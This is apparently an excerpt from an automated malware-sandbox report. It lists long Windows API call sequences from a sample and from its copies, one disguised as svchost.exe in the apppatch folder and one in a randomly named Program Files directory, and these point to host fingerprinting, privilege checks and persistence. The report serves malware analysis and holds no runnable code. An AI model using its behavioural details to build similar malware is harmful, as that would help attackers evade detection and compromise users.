Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00694B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 5_2_00694B00
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014D4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 6_2_014D4B00
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,0_2_00402D30
Source: C:\Windows\apppatch\svchost.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,2_2_00403A20
Source: C:\Windows\apppatch\svchost.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,2_2_00402D30
Source: C:\Windows\apppatch\svchost.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,2_2_02BB7FD0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,RtlAddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02BC5720
Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,2_2_02BC6CA0
Source: C:\Windows\apppatch\svchost.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02BD2BB0
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,StrStrIA,2_2_02BD2B40
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,2_2_02BBD970
Source: C:\Windows\apppatch\svchost.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,2_2_02BB1170
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,2_2_02BD1690
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,2_2_02BB3610
Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,2_2_02BCCE10
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_02BB1660
Source: C:\Windows\apppatch\svchost.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,2_2_02BD3F50
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,2_2_02BD3CE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,2_2_02BD1460
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserNameA,memset,StrStrIA,2_2_02BCADE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,2_2_02BD25C0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,5_2_006A6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,5_2_00691170
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,5_2_0069D970
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,StrStrIA,5_2_006B2B40
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,5_2_006B2BB0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,5_2_006B1460
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,5_2_006B3CE0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetUserNameA,memset,StrStrIA,5_2_006AADE0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,5_2_006B25C0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,5_2_00691660
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,5_2_00693610
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,5_2_006ACE10
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,5_2_006B1690
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,5_2_006B3F50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,5_2_006A5720
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,5_2_00697FD0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,6_2_014E6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,6_2_014D1170
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,6_2_014DD970
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,StrStrIA,6_2_014F2B40
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,6_2_014F2BB0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,6_2_014F25C0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetUserNameA,memset,StrStrIA,6_2_014EADE0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,6_2_014F1460
